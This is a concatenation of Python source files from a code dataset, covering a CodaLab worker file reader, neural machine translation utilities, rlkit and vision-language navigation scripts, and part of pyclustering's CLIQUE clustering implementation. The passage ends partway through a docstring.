from codalab.worker.file_util import (
gzip_file,
gzip_bytestring,
read_file_section,
summarize_file,
tar_gzip_directory,
)
class Reader(object):
def __init__(self):
self.read_handlers = {
'get_target_info': self.get_target_info,
'stream_directory': self.stream_directory,
'stream_file': self.stream_file,
'read_file_section': self.read_file_section,
'summarize_file': self.summarize_file,
}
self.read_threads = [] # Threads
def read(self, run_state, path, read_args, reply):
read_type = read_args['type']
handler = self.read_handlers.get(read_type, None)
if handler:
handler(run_state, path, read_args, reply)
else:
err = (http.client.BAD_REQUEST, "Unsupported read_type for read: %s" % read_type)
reply(err)
def stop(self):
for thread in self.read_threads:
thread.join()
def _threaded_read(self, run_state, path, stream_fn, reply_fn):
"""
Given a run state, a path, a stream function and a reply function,
- Computes the real filesystem path to the path in the bundle
- In case of error, invokes reply_fn with an http error
- Otherwise starts a thread calling stream_fn on the computed final path
"""
try:
final_path = get_target_path(run_state.bundle_path, run_state.bundle.uuid, path)
except PathException as e:
reply_fn((http.client.NOT_FOUND, str(e)), None, None)
read_thread = threading.Thread(target=stream_fn, args=[final_path])
read_thread.start()
self.read_threads.append(read_thread)
def get_target_info(self, run_state, path, args, reply_fn):
"""
Return target_info of path in bundle as a message on the reply_fn
"""
target_info = None
dep_paths = set([dep.child_path for dep in run_state.bundle.dependencies.values()])
# if path is a dependency raise an error
if path and os.path.normpath(path) in dep_paths:
err = (
http.client.NOT_FOUND,
'{} not found in bundle {}'.format(path, run_state.bundle.uuid),
)
reply_fn(err, None, None)
return
else:
try:
target_info = download_util.get_target_info(
run_state.bundle_path, run_state.bundle.uuid, path, args['depth']
)
except PathException as e:
err = (http.client.NOT_FOUND, str(e))
reply_fn(err, None, None)
return
if not path and args['depth'] > 0:
target_info['contents'] = [
child for child in target_info['contents'] if child['name'] not in dep_paths
]
reply_fn(None, {'target_info': target_info}, None)
def stream_directory(self, run_state, path, args, reply_fn):
"""
Stream the directory at path using a separate thread
"""
dep_paths = set([dep.child_path for dep in run_state.bundle.dependencies.values()])
exclude_names = [] if path else dep_paths
def stream_thread(final_path):
with closing(tar_gzip_directory(final_path, exclude_names=exclude_names)) as fileobj:
reply_fn(None, {}, fileobj)
self._threaded_read(run_state, path, stream_thread, reply_fn)
def stream_file(self, run_state, path, args, reply_fn):
"""
Stream the file at path using a separate thread
"""
def stream_file(final_path):
with closing(gzip_file(final_path)) as fileobj:
reply_fn(None, {}, fileobj)
self._threaded_read(run_state, path, stream_file, reply_fn)
def read_file_section(self, run_state, path, args, reply_fn):
"""
Read the section of file at path of length args['length'] starting at
args['offset'] (bytes) using a separate thread
"""
def read_file_section_thread(final_path):
bytestring = gzip_bytestring(
read_file_section(final_path, args['offset'], args['length'])
)
reply_fn(None, {}, bytestring)
self._threaded_read(run_state, path, read_file_section_thread, reply_fn)
def summarize_file(self, run_state, path, args, reply_fn):
"""
Summarize the file including args['num_head_lines'] and
args['num_tail_lines'] but limited with args['max_line_length'] using
args['truncation_text'] on a separate thread
"""
def summarize_file_thread(final_path):
bytestring = gzip_bytestring(
summarize_file(
final_path,
args['num_head_lines'],
args['num_tail_lines'],
args['max_line_length'],
args['truncation_text'],
).encode()
)
reply_fn(None, {}, bytestring)
self._threaded_read(run_state, path, summarize_file_thread, reply_fn)
``` |
{
"source": "josephch405/curriculum-nmt",
"score": 3
} |
#### File: josephch405/curriculum-nmt/utils.py
```python
import math
from typing import List
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import nltk
nltk.download('punkt')
from tqdm import tqdm
def pad_sents(sents, pad_token):
""" Pad list of sentences according to the longest sentence in the batch.
The paddings should be at the end of each sentence.
@param sents (list[list[str]]): list of sentences, where each sentence
is represented as a list of words
@param pad_token (str): padding token
@returns sents_padded (list[list[str]]): list of sentences where sentences shorter
than the max length sentence are padded out with the pad_token, such that
each sentences in the batch now has equal length.
"""
sents_padded = []
### YOUR CODE HERE (~6 Lines)
lens = map(lambda words: len(words), sents)
max_len = max(lens)
for sent in sents:
_sent = sent[:]
_sent += [pad_token] * (max_len - len(_sent))
sents_padded += [_sent]
### END YOUR CODE
return sents_padded
def read_corpus(file_path, source, space_tokenize=False, dev_mode=False):
""" Read file, where each sentence is dilineated by a `\n`.
@param file_path (str): path to file containing corpus
@param source (str): "tgt" or "src" indicating whether text
is of the source language or target language
@param space_tokenize (bool): Whether to tokenize with just spaces. Useful
for BPE input
@param dev_mode (bool): Only reads first 100 lines; for fast iteration
"""
data = []
i = 0
for line in tqdm(open(file_path)):
sent = nltk.word_tokenize(line) if not space_tokenize else line.strip().split()
# only append <s> and </s> to the target sentence
if source == 'tgt':
sent = ['<s>'] + sent + ['</s>']
data.append(sent)
# TODO: nicer iteration dev flag
i += 1
if i > 100 and dev_mode:
break
return data
def batch_iter(data, batch_size, shuffle=False):
""" Yield batches of source and target sentences reverse sorted by length (largest to smallest).
@param data (list of (src_sent, tgt_sent)): list of tuples containing source and target sentence
@param batch_size (int): batch size
@param shuffle (boolean): whether to randomly shuffle the dataset
"""
batch_num = math.ceil(len(data) / batch_size)
index_array = list(range(len(data)))
if shuffle:
np.random.shuffle(index_array)
for i in range(batch_num):
indices = index_array[i * batch_size: (i + 1) * batch_size]
examples = [data[idx] for idx in indices]
examples = sorted(examples, key=lambda e: len(e[0]), reverse=True)
src_sents = [e[0] for e in examples]
tgt_sents = [e[1] for e in examples]
yield src_sents, tgt_sents
def get_pacing_batch(data, batch_size, shuffle=False):
""" Returns (not yields) a single batch of source and target sentences
@param data (list of (src_sent, tgt_sent)): list of tuples containing src and tgt sents
@param batch_size (int): batch size
@param shuffle (boolean): whether to randomly shuffle the dataset
"""
index_array = list(range(len(data)))
if shuffle:
np.random.shuffle(index_array)
indices = index_array[:batch_size]
examples = [data[idx] for idx in indices]
examples = sorted(examples, key=lambda e: len(e[0]), reverse=True)
src_sents = [e[0] for e in examples]
tgt_sents = [e[1] for e in examples]
return src_sents, tgt_sents
``` |
{
"source": "josephch405/rlkit",
"score": 2
} |
#### File: rlkit/scripts/run_gibson_policy.py
```python
import argparse
import torch
from rlkit.core import logger
from rlkit.samplers.rollout_functions import rollout
from rlkit.envs.wrappers import NormalizedBoxEnv
import rlkit.torch.pytorch_util as ptu
from rlkit.util.gibson import add_env_args, get_config_file, load_env
def simulate_policy(args):
data = torch.load(args.file)
policy = data['evaluation/policy']
if args.gpu:
ptu.set_gpu_mode(True)
policy.cuda()
print("set gpu")
print(ptu.device)
config_file = get_config_file(args.config_file)
env = NormalizedBoxEnv(
load_env(args, config_file, args.env_mode, ptu.device.index))
print("Policy loaded")
while True:
path = rollout(
env,
policy,
max_path_length=args.H,
render=False,
)
if hasattr(env, "log_diagnostics"):
env.log_diagnostics([path])
logger.dump_tabular()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('file', type=str,
help='path to the snapshot file')
parser.add_argument('--H', type=int, default=300,
help='Max length of rollout')
parser.add_argument('--gpu', action='store_true')
add_env_args(parser)
args = parser.parse_args()
simulate_policy(args)
``` |
{
"source": "josephch405/selfmonitoring-agent",
"score": 3
} |
#### File: selfmonitoring-agent/scripts/generate_navigable_labels_multi.py
```python
import numpy as np
import cv2
import json
import math
import base64
import csv
import sys
from torchvision import transforms, models
import torch
import matplotlib.pyplot as plt
csv.field_size_limit(sys.maxsize)
sys.path.append('build')
# Caffe and MatterSim need to be on the Python path
import MatterSim
from timer import Timer
TSV_FIELDNAMES = ['scanId', 'viewpointId', 'nav']
VIEWPOINT_SIZE = 36 # Number of discretized views from one viewpoint
FEATURE_SIZE = 1000 # 2048
BATCH_SIZE = 4 # Some fraction of viewpoint size - batch size 4 equals 11GB memory
GPU_ID = 0
OUTFILE = 'img_features/navigable.tsv'
GRAPHS = 'connectivity/'
# Simulator image parameters
WIDTH=640
HEIGHT=480
VFOV=60
torch.no_grad()
def load_viewpointids():
viewpointIds = []
with open(GRAPHS+'scans.txt') as f:
scans = [scan.strip() for scan in f.readlines()]
for scan in scans:
with open(GRAPHS+scan+'_connectivity.json') as j:
data = json.load(j)
for item in data:
if item['included']:
viewpointIds.append((scan, item['image_id']))
print('Loaded %d viewpoints' % len(viewpointIds))
return viewpointIds
def build_tsv():
# Set up the simulator
sim = MatterSim.Simulator()
sim.setCameraResolution(WIDTH, HEIGHT)
sim.setCameraVFOV(math.radians(VFOV))
sim.setDiscretizedViewingAngles(True)
sim.setRenderingEnabled(False)
sim.init()
count = 0
t_render = Timer()
with open(OUTFILE, 'w') as tsvfile:
writer = csv.DictWriter(tsvfile, delimiter = '\t', fieldnames = TSV_FIELDNAMES)
# Loop all the viewpoints in the simulator
viewpointIds = load_viewpointids()
for scanId,viewpointId in viewpointIds:
t_render.tic()
# Loop all discretized views from this location
blobs = []
# Each vertex has a max of 8 possible nav directions
# Each target is [heading, elevation, dist]
features = np.zeros([VIEWPOINT_SIZE, 10, 3], dtype=np.float32)
for ix in range(VIEWPOINT_SIZE):
if ix == 0:
sim.newEpisode(scanId, viewpointId, 0, math.radians(-30))
elif ix % 12 == 0:
sim.makeAction(0, 1.0, 1.0)
else:
sim.makeAction(0, 1.0, 0)
state = sim.getState()
assert state.viewIndex == ix
all_nav_except_stay = state.navigableLocations[1:]
target_mapping = lambda l: [l.rel_heading, l.rel_elevation, l.rel_distance]
filter_distances = lambda l: l[2] <= 5 and l[2] >= 0.5
list_of_navs = map(target_mapping, all_nav_except_stay)
list_of_navs = list(filter(filter_distances, list_of_navs))
n_arr = np.array(list_of_navs, dtype=np.float32)
if len(n_arr) > 0:
features[ix, :len(n_arr)] = n_arr
t_render.toc()
writer.writerow({
'scanId': scanId,
'viewpointId': viewpointId,
'nav': base64.b64encode(features).decode('ascii')
})
count += 1
if count % 100 == 0:
print('Processed %d / %d viewpoints, %.1fs avg render time, projected %.1f hours' %\
(count,len(viewpointIds), t_render.average_time,
(t_render.average_time)*(len(viewpointIds)- count)/3600))
def read_tsv(infile):
# Verify we can read a tsv
in_data = []
with open(infile, "r+") as tsv_in_file:
reader = csv.DictReader(tsv_in_file, delimiter='\t', fieldnames = TSV_FIELDNAMES)
for item in reader:
item['nav'] = np.frombuffer(base64.b64decode(item['nav']),
dtype=np.float32).reshape(-1, 10, 3)
in_data.append(item)
return in_data
if __name__ == "__main__":
build_tsv()
data = read_tsv(OUTFILE)
print('Completed %d viewpoints' % len(data))
```
#### File: tasks/R2R-pointing/data.py
```python
import base64
import csv
import sys
import numpy as np
IMG_FIELDNAMES = ['scanId', 'viewpointId', 'image_w','image_h', 'vfov', 'features']
VIEWPOINT_SIZE = 36 # Number of discretized views from one viewpoint
FEATURE_SIZE = 2048 # 2048
NAV_FIELDNAMES = ['scanId', 'viewpointId', 'nav']
csv.field_size_limit(sys.maxsize)
def read_img_tsv(infile):
# Verify we can read a tsv
in_data = []
with open(infile, "r+") as tsv_in_file:
reader = csv.DictReader(tsv_in_file, delimiter='\t', fieldnames = IMG_FIELDNAMES)
for item in reader:
item['image_h'] = int(item['image_h'])
item['image_w'] = int(item['image_w'])
item['vfov'] = int(item['vfov'])
item['features'] = np.frombuffer(base64.b64decode(item['features']),
dtype=np.float32).reshape((VIEWPOINT_SIZE, FEATURE_SIZE))
in_data.append(item)
return in_data
def read_navigable_tsv(infile):
# Verify we can read a tsv
in_data = []
with open(infile, "r+") as tsv_in_file:
reader = csv.DictReader(tsv_in_file, delimiter='\t', fieldnames = NAV_FIELDNAMES)
for item in reader:
item['nav'] = np.round(np.frombuffer(base64.b64decode(item['nav']),
dtype=np.float32), 8)
in_data.append(item)
return in_data
if __name__ == "__main__":
img_data = read_img_tsv("img_features/ResNet-152-imagenet.tsv")
nav_data = read_navigable_tsv("img_features/navigable.tsv")
```
#### File: tasks/R2R-pointing/models.py
```python
import torch
from torch import nn
from torch import functional as F
final_output_dims = [10, 3]
class LinearBinaryModel(nn.Module):
def __init__(self, *sizes, activation=nn.ReLU):
super(LinearBinaryModel, self).__init__()
assert len(sizes) >= 1, "Need at least one 'sizes' specified"
sizes = list(sizes) + [1]
self.layers = [nn.Linear(sizes[0], sizes[1])]
i = 1
for i in range(1, len(sizes) - 1):
self.layers.append(activation())
self.layers.append(nn.Linear(sizes[i], sizes[i+1]))
i += 1
self.layers = nn.Sequential(*self.layers)
def forward(self, x):
# x is [-1, 2048]
y = x
y = self.layers(y).sigmoid()
return y
class LinearModel(nn.Module):
def __init__(self, *sizes, activation=nn.ReLU):
super(LinearModel, self).__init__()
assert len(sizes) >= 1, "Need at least one 'sizes' specified"
sizes = list(sizes) + [30]
self.layers = [nn.Linear(sizes[0], sizes[1])]
i = 1
for i in range(1, len(sizes) - 1):
self.layers.append(activation())
self.layers.append(nn.Linear(sizes[i], sizes[i+1]))
i += 1
self.layers = nn.Sequential(*self.layers)
def forward(self, x):
# x is [-1, 2048]
y = x
y = self.layers(y)
y = y.view(-1, 10, 3)
y[:, :, :2] = y[:, :, :2].tanh()
y[:, :, 2] = y[:, :, 2].sigmoid() * 20
mask = y[:, :, 2] > 0.5
y[:, :, 0] *= mask
y[:, :, 1] *= mask
return y
# returns [-1, 10, 3]
``` |
{
"source": "josephchapman/slack_nominator",
"score": 3
} |
#### File: slack_nominator/classes/bot.py
```python
import os
import requests
import json
import datetime
from random import shuffle
from classes.user import *
from classes.cache import *
LEGACY_TOKEN = os.environ['SLACK_LEGACY_TOKEN']
# Methods:
# settings_read()
# select()
# _select(cached_members, inclusions)
# post_message(channel, message)
# assign()
class Bot():
def __init__(self):
self.settings_file = 'settings.json'
self.cache = Cache() # Instantiate the cache
def settings_read(self):
with open(self.settings_file, 'r') as infile:
settings_data = json.load(infile)
return settings_data
def select(self):
# This method is a wrapper around `_select()`
# It reads the settings and cache,
# then passes the required data to `_select()`
# Read cache file: `member_cache.json`
cache_data = self.cache.read()
# Read settings file: `settings.json`
settings_data = self.settings_read()
# Select a member from inclusions, using cached data for details
selected_member_obj = self._select(cache_data['Members'], settings_data['Inclusions'])
return selected_member_obj
def _select(self, cached_members, inclusions):
# Returns a `User` object (or None) from a list of `inclusions` based on attributes.
# The `cached_members` data is used to translate between `Real Name` and `ID`
# Turn `inclusions` into list of IDs
members = [cached_member['ID'] for cached_member in cached_members if cached_member['Real Name'] in inclusions]
# Shuffle the member IDs from cache
shuffle(members)
# Check they're included and active
# but not remote
for member in members:
member_obj = User(member)
if (
member_obj.presence() == 'active' and
not member_obj.remote()
):
print('Selected Member: {}'.format(str(member_obj.names())))
return member_obj
else:
print('Selected Member: NONE FOUND')
return None
def post_message(self, channel, message):
# As of October 2017, this API method accepts 'Content-type': 'application/json',
# https://api.slack.com/methods/chat.postMessage
# https://api.slack.com/changelog/2017-10-keeping-up-with-the-jsons
# The requests.post request can therefore use the `json` option to send the payload.
# http://docs.python-requests.org/en/master/user/quickstart/#passing-parameters-in-urls
# `json` option requires requests version 2.4.2. Run `pip show requests` to view installed version.
headers = {
'Content-type': 'application/json; charset=UTF-8',
'Authorization': 'Bearer {}'.format(LEGACY_TOKEN)
}
payload = {
'channel': channel,
'text': message,
'as_user': 'false',
'username': 'Slack Nominator',
'icon_emoji': ':game_die:'
}
r = requests.post(
'https://slack.com/api/chat.postMessage',
headers=headers,
json=payload
)
return r.text
def assign(self):
# Read settings file: `settings.json`
settings_data = self.settings_read()
cache_data = self.cache.read()
# Convert timestamps in the cache file to datetime objects
latest_flush_strp = datetime.datetime.strptime(cache_data['Latest Flush'], '%Y-%m-%d %H:%M:%S')
latest_update_strp = datetime.datetime.strptime(cache_data['Latest Update'], '%Y-%m-%d %H:%M:%S')
# if it's Monday and cache wasn't already flushed today
if (
datetime.date.today().weekday() == 0 and
not latest_flush_strp.date() == datetime.datetime.now().date()
):
self.cache.flush()
# Update cache
cache_data = self.cache._update(settings_data['Settings']['Channel Scan'], cache_data)
# Select member
selected_member_obj = self._select(cache_data['Members'], settings_data['Inclusions'])
action = 'take notes in the huddle today'
# Post message
if selected_member_obj:
user_id = selected_member_obj.id
username, real_name = selected_member_obj.names()
message = '{0} (<@{1}>) has been randomly selected to {2}'.format(real_name, user_id, action)
print(message)
response = self.post_message(settings_data['Settings']['Channel Post'], message)
print ('Response: {}\n'.format(response))
else:
message = 'I failed to find a valid user to {}'.format(action)
print(message)
response = self.post_message(settings_data['Settings']['Channel Post'], message)
print ('Response: {}\n'.format(response))
``` |
{
"source": "JosephChataignon/limited-comparators-quantizer",
"score": 3
} |
#### File: JosephChataignon/limited-comparators-quantizer/core.py
```python
import numpy as np
import copy
import update,utils
import visualization as visu
import measures as ms
def centroids(hyperplanes,param,distrib,dataset=None):
"""
Gives the centroid of every non-void region. The returned object is an
array containing every non-void regions with the coordinates of its
centroid.
param is the number of realisations of f on the whole space, that are
used for computing the centroids. Augmenting it will augment the
precision but also computation time.
"""
output = []
rpr = [] # realisations per region
for i in range(param):
x = utils.f(len(hyperplanes[0])-1 , distrib, dataset)
r = utils.findRegion(x,hyperplanes)
ir = -1 # index of r in the array output
for j in range(len(output)): # check if r is already registered
if np.all(output[j][0] == r):
ir = j
break
if ir == -1:
output.append([r,x])
rpr.append(1.)
else:
output[ir][1] += x
rpr[ir] += 1.
# divide the coordinates for each region by the rpr for that region
for k in range(len(output)):
output[k][1] /= rpr[k]
return np.array(output)
def optimisation(hp,pCentroids,pMeasure,pOptimisation,visualisation=[False,False,10],wTitle='',distrib='gaussian',m='mse',updateMethod='random directions',precisionCheck=False,structureCheck=False):
'''
Uses an update function to update the hyperplanes hp, with pCentroids
and pMeasure as parametersof the functions centroids() and measure()
pOptimisation: number of iterations
visualisation = [bool visualiseInitial, bool visualiseSteps, int stepsInterval]
wTitle: the title used for visualisation
distrib: the random distribution studied
updateMethod: the method to use
If precisionCheck, it is checked wether or not the new config generated
is better than the previous one.
If structureCheck, it is checked wether or not the structure of the new
config (hyperplanes intersections, regions) is different from the
previous one.
'''
measureEvolution = [ms.measure(m,hp,pCentroids,pMeasure,distrib)]
saveHyperplanes = [hp]
if visualisation[0]:
visu.visualiseHyperplanes(hp,wTitle+', iteration= %d, error= %f'%(0,measureEvolution[-1]),5,distrib)
# optimization steps
for k in range(1,pOptimisation+1):
print('optimisation function: iteration',k,'of',pOptimisation)
u = update.choseUpdateFunction(updateMethod,k)
if u == 'oneVarInterpolation':
for i in range(len(hp)):
for j in range(len(hp[i])):
hp,newMeasure = update.oneVarInterpolation(hp,pCentroids,pMeasure*k,k,
measureEvolution[-1],
distrib,m,
precisionCheck,
structureCheck,
var=[i,j])
elif u == 'indVarByVar':
for i in range(len(hp)):
for j in range(len(hp[i])):
hp,newMeasure = update.updateHyperplanes(hp,pCentroids,pMeasure*k,k,
measureEvolution[-1],
u,distrib,m,
precisionCheck,
structureCheck,
var=[i,j])
else:
hp,newMeasure = update.updateHyperplanes(hp,pCentroids,pMeasure*k,k,
measureEvolution[-1],
u,distrib,m,
precisionCheck,
structureCheck)
measureEvolution.append(newMeasure)
saveHyperplanes.append(copy.deepcopy(hp))
# display result
if (k % visualisation[2] == 0) and visualisation[1]:
visu.visualiseHyperplanes( hp , wTitle+', iteration= %d, error= %f'%(k,measureEvolution[-1]) , 5 , distrib)
print('measureEvolution[-1]',measureEvolution[-1])
return measureEvolution,saveHyperplanes
``` |
{
"source": "JosephChataignon/pyclustering",
"score": 2
} |
#### File: ci/cloud/__main__.py
```python
import sys
from cloud.task import task
from cloud.task_handler import task_handler
def run():
if len(sys.argv) == 2:
client_task = task(sys.argv[1], [])
token = ""
elif len(sys.argv) < 3:
raise SyntaxError("ERROR: Incorrect amount of arguments '%d' "
"(please, see 'python3 ci/cloud --help')." % len(sys.argv))
else:
token = sys.argv[1]
action = sys.argv[2]
params = sys.argv[3:]
client_task = task(action, params)
task_handler(token).process(client_task)
if __name__ == '__main__':
try:
run()
exit(0)
except Exception as error:
print(error)
exit(-1)
```
#### File: pyclustering/cluster/clique.py
```python
import itertools
from pyclustering.cluster import cluster_visualizer
from pyclustering.cluster.encoder import type_encoding
from pyclustering.core.wrapper import ccore_library
import pyclustering.core.clique_wrapper as wrapper
import matplotlib
import matplotlib.gridspec as gridspec
import matplotlib.pyplot as plt
import matplotlib.patches as patches
class clique_visualizer:
"""!
@brief Visualizer of CLIQUE algorithm's results.
@details CLIQUE visualizer provides visualization services that are specific for CLIQUE algorithm, for example,
to display grid and its density.
"""
__maximum_density_alpha = 0.6
@staticmethod
def show_grid(cells, data):
"""!
@brief Show CLIQUE blocks as a grid in data space.
@details Each block contains points and according to this density is displayed. CLIQUE grid helps to visualize
grid that was used for clustering process.
@param[in] cells (list): List of cells that is produced by CLIQUE algorithm.
@param[in] data (array_like): Input data that was used for clustering process.
"""
dimension = cells[0].dimensions
amount_canvases = 1
if dimension > 1:
amount_canvases = int(dimension * (dimension - 1) / 2)
figure = plt.figure()
grid_spec = gridspec.GridSpec(1, amount_canvases)
pairs = list(itertools.combinations(range(dimension), 2))
if len(pairs) == 0: pairs = [(0, 0)]
for index in range(amount_canvases):
ax = figure.add_subplot(grid_spec[index])
clique_visualizer.__draw_cells(ax, cells, pairs[index])
clique_visualizer.__draw_two_dimension_data(ax, data, pairs[index])
plt.show()
plt.close(figure)
@staticmethod
def show_clusters(data, clusters, noise=None):
"""!
@brief Display CLIQUE clustering results.
@param[in] data (list): Data that was used for clustering.
@param[in] clusters (array_like): Clusters that were allocated by the algorithm.
@param[in] noise (array_like): Noise that were allocated by the algorithm.
"""
visualizer = cluster_visualizer()
visualizer.append_clusters(clusters, data)
visualizer.append_cluster(noise or [], data, marker='x')
visualizer.show()
@staticmethod
def __draw_two_dimension_data(ax, data, pair):
"""!
@brief Display data in two-dimensional canvas.
@param[in] ax (Axis): Canvas where data should be displayed.
@param[in] data (list): Data points that should be displayed.
@param[in] pair (tuple): Pair of dimension indexes.
"""
ax.set_xlabel("x%d" % pair[0])
ax.set_ylabel("x%d" % pair[1])
for point in data:
if len(data[0]) > 1:
ax.plot(point[pair[0]], point[pair[1]], color='red', marker='.')
else:
ax.plot(point[pair[0]], 0, color='red', marker='.')
ax.yaxis.set_ticklabels([])
@staticmethod
def __draw_cells(ax, cells, pair):
ax.grid(False)
density_scale = max(len(cell.points) for cell in cells)
for cell in cells:
clique_visualizer.__draw_cell(ax, pair, cell, density_scale)
@staticmethod
def __draw_cell(ax, pair, cell, density_scale):
max_corner, min_corner = clique_visualizer.__get_rectangle_description(cell, pair)
belong_cluster = (len(cell.points) > 0)
if density_scale != 0.0:
density_scale = clique_visualizer.__maximum_density_alpha * len(cell.points) / density_scale
face_color = matplotlib.colors.to_rgba('blue', alpha=density_scale)
edge_color = matplotlib.colors.to_rgba('black', alpha=1.0)
rect = patches.Rectangle(min_corner, max_corner[0] - min_corner[0], max_corner[1] - min_corner[1],
fill=belong_cluster,
facecolor=face_color,
edgecolor=edge_color,
linewidth=0.5)
ax.add_patch(rect)
#ax.annotate(str(cell.logical_location), (min_corner[0], min_corner[1]), fontsize=6, ha='center', va='center')
@staticmethod
def __get_rectangle_description(cell, pair):
max_corner, min_corner = cell.spatial_location.get_corners()
max_corner = [max_corner[pair[0]], max_corner[pair[1]]]
min_corner = [min_corner[pair[0]], min_corner[pair[1]]]
if pair == (0, 0):
max_corner[1], min_corner[1] = 1.0, -1.0
return max_corner, min_corner
class spatial_block:
"""!
@brief Geometrical description of CLIQUE block in data space.
@details Provides services related to spatial functionality.
@see bang_block
"""
def __init__(self, max_corner, min_corner):
"""!
@brief Creates spatial block in data space.
@param[in] max_corner (array_like): Maximum corner coordinates of the block.
@param[in] min_corner (array_like): Minimal corner coordinates of the block.
"""
self.__max_corner = max_corner
self.__min_corner = min_corner
def __str__(self):
"""!
@brief Returns string block description.
@return String representation of the block.
"""
return "(max: %s; min: %s)" % (self.__max_corner, self.__min_corner)
def __contains__(self, point):
"""!
@brief Point is considered as contained if it lies in block (belong to it).
@return (bool) True if point is in block, otherwise False.
"""
for i in range(len(point)):
if point[i] < self.__min_corner[i] or point[i] > self.__max_corner[i]:
return False
return True
def get_corners(self):
"""!
@brief Return spatial description of current block.
@return (tuple) Pair of maximum and minimum corners (max_corner, min_corner).
"""
return self.__max_corner, self.__min_corner
class clique_block:
"""!
@brief CLIQUE block contains information about its logical location in grid, spatial location in data space and
points that are covered by the block.
"""
def __init__(self, logical_location=None, spatial_location=None, points=None, visited=False):
"""!
@brief Initializes CLIQUE block.
@param[in] logical_location (list): Logical location of the block in CLIQUE grid.
@param[in] spatial_location (spatial_block): Spatial location in data space.
@param[in] points (array_like): Points that belong to this block (can be obtained by method 'capture_points',
this parameter is used by CLIQUE in case of processing by C++ implementation when clustering
result are passed back to Python code.
@param[in] visited (bool): Marks if block is visited during clustering process.
"""
self.__logical_location = logical_location or []
self.__spatial_location = spatial_location
self.__points = points or []
self.__visited = visited
def __str__(self):
"""!
@brief Returns string representation of the block using its logical location in CLIQUE grid.
"""
return str(self.__logical_location)
def __repr__(self):
"""!
@brief Returns string representation of the block using its logical location in CLIQUE grid.
"""
return str(self.__logical_location)
@property
def logical_location(self):
"""!
@brief Logical location is represented by coordinates in CLIQUE grid, for example, in case of 2x2 grid blocks
may have following coordinates: [0, 0], [0, 1], [1, 0], [1, 1].
@return (list) Logical location of the block in CLIQUE grid.
"""
return self.__logical_location
@logical_location.setter
def logical_location(self, location):
"""!
@brief Assign logical location to CLIQUE block.
@param[in] location (list): New logical location of the block in CLIQUE grid.
"""
self.__logical_location = location
@property
def spatial_location(self):
"""!
@brief Spatial location is represented by real data space coordinates.
@return (spatial_block) Spatial block that describes location in data space.
"""
return self.__spatial_location
@spatial_location.setter
def spatial_location(self, location):
"""!
@brief Assign spatial location to CLIQUE block.
@param[in] location (spatial_block): New spatial location of the block.
"""
self.__spatial_location = location
@property
def dimensions(self):
"""!
@brief Amount of dimensions where CLIQUE block is located.
@return (uint) Amount of dimensions where CLIQUE block is located.
"""
return len(self.__logical_location)
@property
def points(self):
"""!
@brief Points that belong to the CLIQUE block.
@details Points are represented by indexes that correspond to points in input data space.
@return (array_like) Points that belong to the CLIQUE block.
@see capture_points
"""
return self.__points
@property
def visited(self):
"""!
@brief Defines whether block is visited during cluster analysis.
@details If cluster analysis has not been performed then value will False.
@return (bool) True if block has been visited during processing, False otherwise.
"""
return self.__visited
@visited.setter
def visited(self, visited):
"""!
@brief Marks or unmarks block as a visited.
@details This setter is used by CLIQUE algorithm.
@param[in] visited (bool): New visited state for the CLIQUE block.
"""
self.__visited = visited
def capture_points(self, data, point_availability):
"""!
@brief Finds points that belong to this block using availability map to reduce computational complexity by
checking whether the point belongs to the block.
@details Algorithm complexity of this method is O(n).
@param[in] data (array_like): Data where points are represented as coordinates.
@param[in] point_availability (array_like): Contains boolean values that denote whether point is already belong
to another CLIQUE block.
"""
for index_point in range(len(data)):
if (point_availability[index_point] is True) and (data[index_point] in self.__spatial_location):
self.__points.append(index_point)
point_availability[index_point] = False
def get_location_neighbors(self, edge):
"""!
@brief Forms list of logical location of each neighbor for this particular CLIQUE block.
@param[in] edge (uint): Amount of intervals in each dimension that is used for clustering process.
@return (list) Logical location of each neighbor for this particular CLIQUE block.
"""
neighbors = []
for index_dimension in range(len(self.__logical_location)):
if self.__logical_location[index_dimension] + 1 < edge:
position = self.__logical_location[:]
position[index_dimension] += 1
neighbors.append(position)
if self.__logical_location[index_dimension] - 1 >= 0:
position = self.__logical_location[:]
position[index_dimension] -= 1
neighbors.append(position)
return neighbors
class coordinate_iterator:
"""!
@brief Coordinate iterator is used to generate logical location description for each CLIQUE block.
@details This class is used by CLIQUE algorithm for clustering process.
"""
def __init__(self, dimension, intervals):
"""!
@brief Initializes coordinate iterator for CLIQUE algorithm.
@param[in] dimension (uint): Amount of dimensions in input data space.
@param[in] intervals (uint): Amount of intervals in each dimension.
"""
self.__intervals = intervals
self.__dimension = dimension
self.__coordiate = [0] * dimension
def get_coordinate(self):
"""!
@brief Returns current block coordinate.
"""
return self.__coordiate
def increment(self):
"""!
@brief Forms logical location for next block.
"""
for index_dimension in range(self.__dimension):
if self.__coordiate[index_dimension] + 1 < self.__intervals:
self.__coordiate[index_dimension] += 1
return
else:
self.__coordiate[index_dimension] = 0
self.__coordiate = None
class clique:
"""!
@brief Class implements CLIQUE grid based clustering algorithm.
@details CLIQUE automatically finds subspaces with high-density clusters. It produces identical results
irrespective of the order in which the input records are presented and it does not presume any canonical
distribution for input data @cite article::clique::1.
Here is an example where data in two-dimensional space is clustered using CLIQUE algorithm:
@code
from pyclustering.cluster.clique import clique, clique_visualizer
from pyclustering.utils import read_sample
from pyclustering.samples.definitions import FCPS_SAMPLES
# read two-dimensional input data 'Target'
data = read_sample(FCPS_SAMPLES.SAMPLE_TARGET)
# create CLIQUE algorithm for processing
intervals = 10 # defines amount of cells in grid in each dimension
threshold = 0 # lets consider each point as non-outlier
clique_instance = clique(data, intervals, threshold)
# start clustering process and obtain results
clique_instance.process()
clusters = clique_instance.get_clusters() # allocated clusters
noise = clique_instance.get_noise() # points that are considered as outliers (in this example should be empty)
cells = clique_instance.get_cells() # CLIQUE blocks that forms grid
print("Amount of clusters:", len(clusters))
# visualize clustering results
clique_visualizer.show_grid(cells, data) # show grid that has been formed by the algorithm
clique_visualizer.show_clusters(data, clusters, noise) # show clustering results
@endcode
In this example 6 clusters are allocated including four small cluster where each such small cluster consists of
three points. There are visualized clustering results - grid that has been formed by CLIQUE algorithm with
density and clusters itself:
@image html clique_clustering_target.png "Fig. 1. CLIQUE clustering results (grid and clusters itself)."
Sometimes such small clusters should be considered as outliers taking into account fact that two clusters in the
central are relatively huge. To treat them as a noise threshold value should be increased:
@code
intervals = 10
threshold = 3 # block that contains 3 or less points is considered as a outlier as well as its points
clique_instance = clique(data, intervals, threshold)
@endcode
Two clusters are allocated, but in this case some points in cluster-"circle" are also considered as outliers,
